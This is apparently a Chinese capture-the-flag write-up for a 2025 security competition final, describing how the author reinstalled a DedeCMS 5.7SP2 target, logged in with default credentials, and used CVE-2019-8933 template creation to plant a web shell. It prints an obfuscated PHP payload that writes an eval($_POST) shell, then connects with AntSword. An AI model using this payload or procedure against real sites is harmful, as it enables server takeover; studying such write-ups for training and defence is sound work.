2025软件系统安全大赛决赛backup WP

根据附件发现是dedecms
后台路径是/dede

发现需要密码，尝试爆破失败

assets/2025软件系统安全大赛决赛backup WriteUp/image-20250518125903772.png

在启动环境的时候发现进入了安装页面，但是不知道数据库密码。

想到可以在自己电脑使用phpstudy启动一个数据库服务，然后连接。

assets/2025软件系统安全大赛决赛backup WriteUp/image-20250518130102583.png

默认root用户不能被外网访问，在这里需要新建一个用户，并改一下访问权限

assets/2025软件系统安全大赛决赛backup WriteUp/image-20250518130211359.png

然后用navicat连接root用户改一下刚刚新建用户的权限

assets/2025软件系统安全大赛决赛backup WriteUp/image-20250518200759510.png

本机数据库配置好之后重新启动靶机，趁没有自动安装好之前，自己安装，修改数据库信息即可，其他不变

assets/2025软件系统安全大赛决赛backup WriteUp/image-20250518130602453.png

安装好后，使用默认密码admin:admin登录后台，发现是dedecms 5.7SP2版本

assets/2025软件系统安全大赛决赛backup WriteUp/image-20250518130757077.png

查看给的附件的修改日期发现，file_manage_control.php被修改，file_manage_control.php 文件包含也许被修了，尝试其他漏洞

assets/2025软件系统安全大赛决赛backup WriteUp/image-20250518131217213.png

这里利用CVE-2019-8933（感谢Awesome-POC项目）

assets/2025软件系统安全大赛决赛backup WriteUp/image-20250518131329237.png

在模板 -> 默认模板管理 -> 新建模板，写入shell，使用poc中可以BYPASS的payload

assets/2025软件系统安全大赛决赛backup WriteUp/image-20250518131051010.png

assets/2025软件系统安全大赛决赛backup WriteUp/image-20250518131358528.png

把GET改成POST方便AntSword连接

<?php
"\x66\x69\x6c\x65\x5f\x70\x75\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73"('./shell.php', "<?php eva" . "l(\$_POS" . "T[a]);");

在模块 -> 文件管理器，修改刚刚新建的模板的文件后缀为php

assets/2025软件系统安全大赛决赛backup WriteUp/image-20250518132238812.png

然后访问

http://URL/templets/default/newtpl.php

发现被成功解析

在当前目录生成了shell.php

assets/2025软件系统安全大赛决赛backup WriteUp/image-20250518132309732.png

使用AntSword连接http://URL/templets/default/shell.php即可

assets/2025软件系统安全大赛决赛backup WriteUp/image-20250518131900708.png

在根目录发现flag

assets/2025软件系统安全大赛决赛backup WriteUp/image-20250518131911860.png

posted @ 2025-05-19 21:49 PengSoar 阅读(65) 评论(0) 收藏举报

刷新页面返回顶部

Peng